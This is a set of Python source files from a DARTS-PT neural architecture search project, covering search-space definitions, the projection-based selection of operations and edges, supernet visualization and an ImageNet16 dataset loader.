('primitives_reduct', 14 * [['skip_connect',
'sep_conv_3x3']])])
primitives_3 = OrderedDict([('primitives_normal', 14 * [['none',
'skip_connect',
'sep_conv_3x3']]),
('primitives_reduct', 14 * [['none',
'skip_connect',
'sep_conv_3x3']])])
primitives_4 = OrderedDict([('primitives_normal', 14 * [['noise',
'sep_conv_3x3']]),
('primitives_reduct', 14 * [['noise',
'sep_conv_3x3']])])
PRIMITIVES = [
# 'none',
'max_pool_3x3', # 0
'avg_pool_3x3', # 1
'skip_connect', # 2
'sep_conv_3x3', # 3
'sep_conv_5x5', # 4
'dil_conv_3x3', # 5
'dil_conv_5x5' # 6
]
primitives_5 = OrderedDict([('primitives_normal', 14 * [PRIMITIVES]),
('primitives_reduct', 14 * [PRIMITIVES])])
spaces_dict = {
's1': primitives_1,
's2': primitives_2,
's3': primitives_3,
's4': primitives_4,
's5': primitives_5, # DARTS Space
}
|
zhengjian2322/darts-pt | sota/cnn/model_search_sdarts_proj.py | import torch.nn.functional as F
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys
sys.path.insert(0, '../../')
from sota.cnn.model_search_darts_proj import DartsNetworkProj
class SDartsNetworkProj(DartsNetworkProj):
def __init__(self, C, num_classes, layers, criterion, primitives, args,
steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
super(SDartsNetworkProj, self).__init__(C, num_classes, layers, criterion, primitives, args,
steps=steps, multiplier=multiplier, stem_multiplier=stem_multiplier,
drop_path_prob=drop_path_prob)
self.softmaxed = False
def _save_arch_parameters(self):
self._saved_arch_parameters = [p.clone() for p in self._arch_parameters]
def softmax_arch_parameters(self):
self._save_arch_parameters()
for p, cell_type in zip(self._arch_parameters, self.candidate_flags.keys()):
p.data.copy_(self.get_projected_weights(cell_type))
self.softmaxed = True # after self.get_projected_weights
def restore_arch_parameters(self):
for i, p in enumerate(self._arch_parameters):
p.data.copy_(self._saved_arch_parameters[i])
del self._saved_arch_parameters
self.softmaxed = False
def get_softmax(self):
if self.softmaxed:
weights_normal = self.alphas_normal
weights_reduce = self.alphas_reduce
else:
weights_normal = F.softmax(self.alphas_normal, dim=-1)
weights_reduce = F.softmax(self.alphas_reduce, dim=-1)
return {'normal': weights_normal, 'reduce': weights_reduce}
def arch_parameters(self):
return self._arch_parameters
|
zhengjian2322/darts-pt | sota/cnn/visualize_full.py | <reponame>zhengjian2322/darts-pt<gh_stars>1-10
import sys
import genotypes
import numpy as np
from graphviz import Digraph
supernet_dict = {
0: ('c_{k-2}', '0'),
1: ('c_{k-1}', '0'),
2: ('c_{k-2}', '1'),
3: ('c_{k-1}', '1'),
4: ('0', '1'),
5: ('c_{k-2}', '2'),
6: ('c_{k-1}', '2'),
7: ('0', '2'),
8: ('1', '2'),
9: ('c_{k-2}', '3'),
10: ('c_{k-1}', '3'),
11: ('0', '3'),
12: ('1', '3'),
13: ('2', '3'),
}
steps = 4
def plot_space(primitives, filename):
g = Digraph(
format='pdf',
edge_attr=dict(fontsize='20', fontname="times"),
node_attr=dict(style='filled', shape='rect', align='center', fontsize='20', height='0.5', width='0.5',
penwidth='2', fontname="times"),
engine='dot')
g.body.extend(['rankdir=LR'])
g.body.extend(['ratio=50.0'])
g.node("c_{k-2}", fillcolor='darkseagreen2')
g.node("c_{k-1}", fillcolor='darkseagreen2')
steps = 4
for i in range(steps):
g.node(str(i), fillcolor='lightblue')
n = 2
start = 0
nodes_indx = ["c_{k-2}", "c_{k-1}"]
for i in range(steps):
end = start + n
p = primitives[start:end]
v = str(i)
for node, prim in zip(nodes_indx, p):
u = node
for op in prim:
g.edge(u, v, label=op, fillcolor="gray")
start = end
n += 1
nodes_indx.append(v)
g.node("c_{k}", fillcolor='palegoldenrod')
for i in range(steps):
g.edge(str(i), "c_{k}", fillcolor="gray")
g.render(filename, view=False)
def plot(genotype, filename):
g = Digraph(
format='pdf',
edge_attr=dict(fontsize='100', fontname="times"),
node_attr=dict(style='filled', shape='rect', align='center', fontsize='100', height='0.5', width='0.5',
penwidth='2', fontname="times"),
engine='dot')
g.body.extend(['rankdir=LR'])
g.body.extend(['ratio=0.3'])
g.node("c_{k-2}", fillcolor='darkseagreen2')
g.node("c_{k-1}", fillcolor='darkseagreen2')
num_edges = len(genotype)
for i in range(steps):
g.node(str(i), fillcolor='lightblue')
for eid in range(num_edges):
op = genotype[eid]
u, v = supernet_dict[eid]
if op != 'skip_connect':
g.edge(u, v, label=op, fillcolor="gray", color='red', fontcolor='red')
else:
g.edge(u, v, label=op, fillcolor="gray")
g.node("c_{k}", fillcolor='palegoldenrod')
for i in range(steps):
g.edge(str(i), "c_{k}", fillcolor="gray")
g.render(filename, view=False)
# def plot(genotype, filename):
# g = Digraph(
# format='pdf',
# edge_attr=dict(fontsize='100', fontname="times", penwidth='3'),
# node_attr=dict(style='filled', shape='rect', align='center', fontsize='100', height='0.5', width='0.5',
# penwidth='2', fontname="times"),
# engine='dot')
# g.body.extend(['rankdir=LR'])
# g.node("c_{k-2}", fillcolor='darkseagreen2')
# g.node("c_{k-1}", fillcolor='darkseagreen2')
# num_edges = len(genotype)
# for i in range(steps):
# g.node(str(i), fillcolor='lightblue')
# for eid in range(num_edges):
# op = genotype[eid]
# u, v = supernet_dict[eid]
# if op != 'skip_connect':
# g.edge(u, v, label=op, fillcolor="gray", color='red', fontcolor='red')
# else:
# g.edge(u, v, label=op, fillcolor="gray")
# g.node("c_{k}", fillcolor='palegoldenrod')
# for i in range(steps):
# g.edge(str(i), "c_{k}", fillcolor="gray")
# g.render(filename, view=False)
if __name__ == '__main__':
#### visualize the supernet ####
if len(sys.argv) != 2:
print("usage:\n python {} ARCH_NAME".format(sys.argv[0]))
sys.exit(1)
genotype_name = sys.argv[1]
assert 'supernet' in genotype_name, 'this script only supports supernet visualization'
try:
genotype = eval('genotypes.{}'.format(genotype_name))
except AttributeError:
print("{} is not specified in genotypes.py".format(genotype_name))
sys.exit(1)
path = '../../figs/genotypes/cnn_supernet_cue/'
plot(genotype.normal, path + genotype_name + "_normal")
plot(genotype.reduce, path + genotype_name + "_reduce")
|
zhengjian2322/darts-pt | nasbench201/DownsampledImageNet.py | <reponame>zhengjian2322/darts-pt
import os, sys, hashlib, torch
import numpy as np
from PIL import Image
import torch.utils.data as data
import pickle
def calculate_md5(fpath, chunk_size=1024 * 1024):
md5 = hashlib.md5()
with open(fpath, 'rb') as f:
for chunk in iter(lambda: f.read(chunk_size), b''):
md5.update(chunk)
return md5.hexdigest()
def check_md5(fpath, md5, **kwargs):
return md5 == calculate_md5(fpath, **kwargs)
def check_integrity(fpath, md5=None):
if not os.path.isfile(fpath): return False
if md5 is None:
return True
else:
return check_md5(fpath, md5)
class ImageNet16(data.Dataset):
# http://image-net.org/download-images
# A Downsampled Variant of ImageNet as an Alternative to the CIFAR datasets
# https://arxiv.org/pdf/1707.08819.pdf
train_list = [
['train_data_batch_1', '27846dcaa50de8e21a7d1a35f30f0e91'],
['train_data_batch_2', 'c7254a054e0e795c69120a5727050e3f'],
['train_data_batch_3', '4333d3df2e5ffb114b05d2ffc19b1e87'],
['train_data_batch_4', '1620cdf193304f4a92677b695d70d10f'],
['train_data_batch_5', '348b3c2fdbb3940c4e9e834affd3b18d'],
['train_data_batch_6', '6e765307c242a1b3d7d5ef9139b48945'],
['train_data_batch_7', '564926d8cbf8fc4818ba23d2faac7564'],
['train_data_batch_8', 'f4755871f718ccb653440b9dd0ebac66'],
['train_data_batch_9', 'bb6dd660c38c58552125b1a92f86b5d4'],
['train_data_batch_10', '8f03f34ac4b42271a294f91bf480f29b'],
]
valid_list = [
['val_data', '3410e3017fdaefba8d5073aaa65e4bd6'],
]
def __init__(self, root, train, transform, use_num_of_class_only=None):
self.root = root
self.transform = transform
self.train = train # training set or valid set
if not self._check_integrity(): raise RuntimeError('Dataset not found or corrupted.')
if self.train:
downloaded_list = self.train_list
else:
downloaded_list = self.valid_list
self.data = []
self.targets = []
# now load the picked numpy arrays
for i, (file_name, checksum) in enumerate(downloaded_list):
file_path = os.path.join(self.root, file_name)
# print ('Load {:}/{:02d}-th : {:}'.format(i, len(downloaded_list), file_path))
with open(file_path, 'rb') as f:
if sys.version_info[0] == 2:
entry = pickle.load(f)
else:
entry = pickle.load(f, encoding='latin1')
self.data.append(entry['data'])
self.targets.extend(entry['labels'])
self.data = np.vstack(self.data).reshape(-1, 3, 16, 16)
self.data = self.data.transpose((0, 2, 3, 1)) # convert to HWC
if use_num_of_class_only is not None:
assert isinstance(use_num_of_class_only,
int) and use_num_of_class_only > 0 and use_num_of_class_only < 1000, 'invalid use_num_of_class_only : {:}'.format(
use_num_of_class_only)
new_data, new_targets = [], []
for I, L in zip(self.data, self.targets):
if 1 <= L <= use_num_of_class_only:
new_data.append(I)
new_targets.append(L)
self.data = new_data
self.targets = new_targets
# self.mean.append(entry['mean'])
# self.mean = np.vstack(self.mean).reshape(-1, 3, 16, 16)
# self.mean = np.mean(np.mean(np.mean(self.mean, axis=0), axis=1), axis=1)
# print ('Mean : {:}'.format(self.mean))
# temp = self.data - np.reshape(self.mean, (1, 1, 1, 3))
# std_data = np.std(temp, axis=0)
# std_data = np.mean(np.mean(std_data, axis=0), axis=0)
# print ('Std : {:}'.format(std_data))
def __getitem__(self, index):
img, target = self.data[index], self.targets[index] - 1
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
return img, target
def __len__(self):
return len(self.data)
def _check_integrity(self):
root = self.root
for fentry in (self.train_list + self.valid_list):
filename, md5 = fentry[0], fentry[1]
fpath = os.path.join(root, filename)
if not check_integrity(fpath, md5):
return False
return True
|
zhengjian2322/darts-pt | sota/cnn/projection.py | import os
import sys
sys.path.insert(0, '../../')
import numpy as np
import torch
import nasbench201.utils as ig_utils
import logging
import torch.utils
from copy import deepcopy
torch.set_printoptions(precision=4, sci_mode=False)
def project_op(model, proj_queue, args, infer, cell_type, selected_eid=None):
''' operation '''
#### macros
num_edges, num_ops = model.num_edges, model.num_ops
candidate_flags = model.candidate_flags[cell_type]
proj_crit = args.proj_crit[cell_type]
#### select an edge
if selected_eid is None:
remain_eids = torch.nonzero(candidate_flags).cpu().numpy().T[0]
if args.edge_decision == "random":
selected_eid = np.random.choice(remain_eids, size=1)[0]
logging.info('selected edge: %d %s', selected_eid, cell_type)
#### select the best operation
if proj_crit == 'loss':
crit_idx = 1
compare = lambda x, y: x > y
elif proj_crit == 'acc':
crit_idx = 0
compare = lambda x, y: x < y
best_opid = 0
crit_extrema = None
for opid in range(num_ops):
## projection
weights = model.get_projected_weights(cell_type)
proj_mask = torch.ones_like(weights[selected_eid])
proj_mask[opid] = 0
weights[selected_eid] = weights[selected_eid] * proj_mask
## proj evaluation
weights_dict = {cell_type: weights}
valid_stats = infer(proj_queue, model, log=False, _eval=False, weights_dict=weights_dict)
crit = valid_stats[crit_idx]
if crit_extrema is None or compare(crit, crit_extrema):
crit_extrema = crit
best_opid = opid
logging.info('valid_acc %f', valid_stats[0])
logging.info('valid_loss %f', valid_stats[1])
#### project
logging.info('best opid: %d', best_opid)
return selected_eid, best_opid
def project_edge(model, proj_queue, args, infer, cell_type):
''' topology '''
#### macros
candidate_flags = model.candidate_flags_edge[cell_type]
proj_crit = args.proj_crit[cell_type]
#### select an edge
remain_nids = torch.nonzero(candidate_flags).cpu().numpy().T[0]
if args.edge_decision == "random":
selected_nid = np.random.choice(remain_nids, size=1)[0]
logging.info('selected node: %d %s', selected_nid, cell_type)
#### select top2 edges
if proj_crit == 'loss':
crit_idx = 1
compare = lambda x, y: x > y
elif proj_crit == 'acc':
crit_idx = 0
compare = lambda x, y: x < y
eids = deepcopy(model.nid2eids[selected_nid])
while len(eids) > 2:
eid_todel = None
crit_extrema = None
for eid in eids:
weights = model.get_projected_weights(cell_type)
weights[eid].data.fill_(0)
weights_dict = {cell_type: weights}
## proj evaluation
valid_stats = infer(proj_queue, model, log=False, _eval=False, weights_dict=weights_dict)
crit = valid_stats[crit_idx]
if crit_extrema is None or not compare(crit, crit_extrema): # find out bad edges
crit_extrema = crit
eid_todel = eid
logging.info('valid_acc %f', valid_stats[0])
logging.info('valid_loss %f', valid_stats[1])
eids.remove(eid_todel)
#### project
logging.info('top2 edges: (%d, %d)', eids[0], eids[1])
return selected_nid, eids
def pt_project(train_queue, valid_queue, model, architect, optimizer,
epoch, args, infer, perturb_alpha, epsilon_alpha):
model.train()
model.printing(logging)
train_acc, train_obj = infer(train_queue, model, log=False)
logging.info('train_acc %f', train_acc)
logging.info('train_loss %f', train_obj)
valid_acc, valid_obj = infer(valid_queue, model, log=False)
logging.info('valid_acc %f', valid_acc)
logging.info('valid_loss %f', valid_obj)
objs = ig_utils.AvgrageMeter()
top1 = ig_utils.AvgrageMeter()
top5 = ig_utils.AvgrageMeter()
#### macros
num_projs = model.num_edges + len(model.nid2eids.keys()) - 1 ## -1 because we project at both epoch 0 and -1
tune_epochs = args.proj_intv * num_projs + 1
proj_intv = args.proj_intv
args.proj_crit = {'normal': args.proj_crit_normal, 'reduce': args.proj_crit_reduce}
proj_queue = valid_queue
#### reset optimizer
model.reset_optimizer(args.learning_rate / 10, args.momentum, args.weight_decay)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
model.optimizer, float(tune_epochs), eta_min=args.learning_rate_min)
#### load proj checkpoints
start_epoch = 0
if args.dev_resume_epoch >= 0:
filename = os.path.join(args.dev_resume_checkpoint_dir, 'checkpoint_{}.pth.tar'.format(args.dev_resume_epoch))
if os.path.isfile(filename):
logging.info("=> loading projection checkpoint '{}'".format(filename))
checkpoint = torch.load(filename, map_location='cpu')
start_epoch = checkpoint['epoch']
model.set_state_dict(architect, scheduler, checkpoint)
model.set_arch_parameters(checkpoint['alpha'])
scheduler.load_state_dict(checkpoint['scheduler'])
model.optimizer.load_state_dict(checkpoint['optimizer']) # optimizer
else:
logging.info("=> no checkpoint found at '{}'".format(filename))
exit(0)
#### projecting and tuning
for epoch in range(start_epoch, tune_epochs):
logging.info('epoch %d', epoch)
## project
if epoch % proj_intv == 0 or epoch == tune_epochs - 1:
## saving every projection
save_state_dict = model.get_state_dict(epoch, architect, scheduler)
ig_utils.save_checkpoint(save_state_dict, False, args.dev_save_checkpoint_dir, per_epoch=True)
if epoch < proj_intv * model.num_edges:
logging.info('project op')
selected_eid_normal, best_opid_normal = project_op(model, proj_queue, args, infer, cell_type='normal')
model.project_op(selected_eid_normal, best_opid_normal, cell_type='normal')
selected_eid_reduce, best_opid_reduce = project_op(model, proj_queue, args, infer, cell_type='reduce')
model.project_op(selected_eid_reduce, best_opid_reduce, cell_type='reduce')
model.printing(logging)
else:
logging.info('project edge')
selected_nid_normal, eids_normal = project_edge(model, proj_queue, args, infer, cell_type='normal')
model.project_edge(selected_nid_normal, eids_normal, cell_type='normal')
selected_nid_reduce, eids_reduce = project_edge(model, proj_queue, args, infer, cell_type='reduce')
model.project_edge(selected_nid_reduce, eids_reduce, cell_type='reduce')
model.printing(logging)
## tune
for step, (input, target) in enumerate(train_queue):
model.train()
n = input.size(0)
## fetch data
input = input.cuda()
target = target.cuda(non_blocking=True)
input_search, target_search = next(iter(valid_queue))
input_search = input_search.cuda()
target_search = target_search.cuda(non_blocking=True)
## train alpha
optimizer.zero_grad();
architect.optimizer.zero_grad()
architect.step(input, target, input_search, target_search,
return_logits=True)
## sdarts
if perturb_alpha:
# transform arch_parameters to prob (for perturbation)
model.softmax_arch_parameters()
optimizer.zero_grad();
architect.optimizer.zero_grad()
perturb_alpha(model, input, target, epsilon_alpha)
## train weight
optimizer.zero_grad();
architect.optimizer.zero_grad()
logits, loss = model.step(input, target, args)
## sdarts
if perturb_alpha:
## restore alpha to unperturbed arch_parameters
model.restore_arch_parameters()
## logging
prec1, prec5 = ig_utils.accuracy(logits, target, topk=(1, 5))
objs.update(loss.data, n)
top1.update(prec1.data, n)
top5.update(prec5.data, n)
if step % args.report_freq == 0:
logging.info('train %03d %e %f %f', step, objs.avg, top1.avg, top5.avg)
if args.fast:
break
## one epoch end
model.printing(logging)
train_acc, train_obj = infer(train_queue, model, log=False)
logging.info('train_acc %f', train_acc)
logging.info('train_loss %f', train_obj)
valid_acc, valid_obj = infer(valid_queue, model, log=False)
logging.info('valid_acc %f', valid_acc)
logging.info('valid_loss %f', valid_obj)
logging.info('projection finished')
model.printing(logging)
num_params = ig_utils.count_parameters_in_Compact(model)
genotype = model.genotype()
logging.info('param size = %f', num_params)
logging.info('genotype = %s', genotype)
return
|
zhengjian2322/darts-pt | sota/cnn/model_search_darts_proj.py | import torch
from copy import deepcopy
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys
sys.path.insert(0, '../../')
from sota.cnn.model_search import Network
class DartsNetworkProj(Network):
def __init__(self, C, num_classes, layers, criterion, primitives, args,
steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
super(DartsNetworkProj, self).__init__(C, num_classes, layers, criterion, primitives, args,
steps=steps, multiplier=multiplier, stem_multiplier=stem_multiplier,
drop_path_prob=drop_path_prob)
self._initialize_flags()
self._initialize_proj_weights()
self._initialize_topology_dicts()
#### proj flags
def _initialize_topology_dicts(self):
self.nid2eids = {0: [2, 3, 4], 1: [5, 6, 7, 8], 2: [9, 10, 11, 12, 13]}
self.nid2selected_eids = {
'normal': {0: [], 1: [], 2: []},
'reduce': {0: [], 1: [], 2: []},
}
def _initialize_flags(self):
self.candidate_flags = {
'normal': torch.tensor(self.num_edges * [True], requires_grad=False, dtype=torch.bool).cuda(),
'reduce': torch.tensor(self.num_edges * [True], requires_grad=False, dtype=torch.bool).cuda(),
} # must be in this order
self.candidate_flags_edge = {
'normal': torch.tensor(3 * [True], requires_grad=False, dtype=torch.bool).cuda(),
'reduce': torch.tensor(3 * [True], requires_grad=False, dtype=torch.bool).cuda(),
}
def _initialize_proj_weights(self):
''' data structures used for proj '''
if isinstance(self.alphas_normal, list):
alphas_normal = torch.stack(self.alphas_normal, dim=0)
alphas_reduce = torch.stack(self.alphas_reduce, dim=0)
else:
alphas_normal = self.alphas_normal
alphas_reduce = self.alphas_reduce
self.proj_weights = { # for hard/soft assignment after project
'normal': torch.zeros_like(alphas_normal),
'reduce': torch.zeros_like(alphas_reduce),
}
#### proj function
def project_op(self, eid, opid, cell_type):
self.proj_weights[cell_type][eid][opid] = 1 ## hard by default
self.candidate_flags[cell_type][eid] = False
def project_edge(self, nid, eids, cell_type):
for eid in self.nid2eids[nid]:
if eid not in eids: # not top2
self.proj_weights[cell_type][eid].data.fill_(0)
self.nid2selected_eids[cell_type][nid] = deepcopy(eids)
self.candidate_flags_edge[cell_type][nid] = False
#### critical function
def get_projected_weights(self, cell_type):
''' used in forward and genotype '''
weights = self.get_softmax()[cell_type]
## proj op
for eid in range(self.num_edges):
if not self.candidate_flags[cell_type][eid]:
weights[eid].data.copy_(self.proj_weights[cell_type][eid])
## proj edge
for nid in self.nid2eids:
if not self.candidate_flags_edge[cell_type][nid]: ## projected node
for eid in self.nid2eids[nid]:
if eid not in self.nid2selected_eids[cell_type][nid]:
weights[eid].data.copy_(self.proj_weights[cell_type][eid])
return weights
def forward(self, input, weights_dict=None):
if weights_dict is None or 'normal' not in weights_dict:
weights_normal = self.get_projected_weights('normal')
else:
weights_normal = weights_dict['normal']
if weights_dict is None or 'reduce' not in weights_dict:
weights_reduce = self.get_projected_weights('reduce')
else:
weights_reduce = weights_dict['reduce']
s0 = s1 = self.stem(input)
for i, cell in enumerate(self.cells):
if cell.reduction:
weights = weights_reduce
else:
weights = weights_normal
s0, s1 = s1, cell(s0, s1, weights, self.drop_path_prob)
out = self.global_pooling(s1)
logits = self.classifier(out.view(out.size(0), -1))
return logits
#### utils
def printing(self, logging, option='all'):
weights_normal = self.get_projected_weights('normal')
weights_reduce = self.get_projected_weights('reduce')
if option in ['all', 'normal']:
logging.info('\n%s', weights_normal)
if option in ['all', 'reduce']:
logging.info('\n%s', weights_reduce)
def genotype(self):
def _parse(weights, normal=True):
PRIMITIVES = self.PRIMITIVES['primitives_normal' if normal else 'primitives_reduct']
gene = []
n = 2
start = 0
for i in range(self._steps):
end = start + n
W = weights[start:end].copy()
try:
edges = sorted(range(i + 2), key=lambda x: -max(
W[x][k] for k in range(len(W[x])) if k != PRIMITIVES[x].index('none')))[:2]
except ValueError:
edges = sorted(range(i + 2), key=lambda x: -max(W[x][k] for k in range(len(W[x]))))[:2]
for j in edges:
k_best = None
for k in range(len(W[j])):
if 'none' in PRIMITIVES[j]:
if k != PRIMITIVES[j].index('none'):
if k_best is None or W[j][k] > W[j][k_best]:
k_best = k
else:
if k_best is None or W[j][k] > W[j][k_best]:
k_best = k
gene.append((PRIMITIVES[start + j][k_best], j))
start = end
n += 1
return gene
weights_normal = self.get_projected_weights('normal')
weights_reduce = self.get_projected_weights('reduce')
gene_normal = _parse(weights_normal.data.cpu().numpy(), True)
gene_reduce = _parse(weights_reduce.data.cpu().numpy(), False)
concat = range(2 + self._steps - self._multiplier, self._steps + 2)
genotype = Genotype(
normal=gene_normal, normal_concat=concat,
reduce=gene_reduce, reduce_concat=concat
)
return genotype
def get_state_dict(self, epoch, architect, scheduler):
model_state_dict = {
'epoch': epoch, ## no +1 because we are saving before projection / at the beginning of an epoch
'state_dict': self.state_dict(),
'alpha': self.arch_parameters(),
'optimizer': self.optimizer.state_dict(),
'arch_optimizer': architect.optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
#### projection
'nid2eids': self.nid2eids,
'nid2selected_eids': self.nid2selected_eids,
'candidate_flags': self.candidate_flags,
'candidate_flags_edge': self.candidate_flags_edge,
'proj_weights': self.proj_weights,
}
return model_state_dict
def set_state_dict(self, architect, scheduler, checkpoint):
#### common
self.load_state_dict(checkpoint['state_dict'])
self.set_arch_parameters(checkpoint['alpha'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
architect.optimizer.load_state_dict(checkpoint['arch_optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
#### projection
self.nid2eids = checkpoint['nid2eids']
self.nid2selected_eids = checkpoint['nid2selected_eids']
self.candidate_flags = checkpoint['candidate_flags']
self.candidate_flags_edge = checkpoint['candidate_flags_edge']
self.proj_weights = checkpoint['proj_weights']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.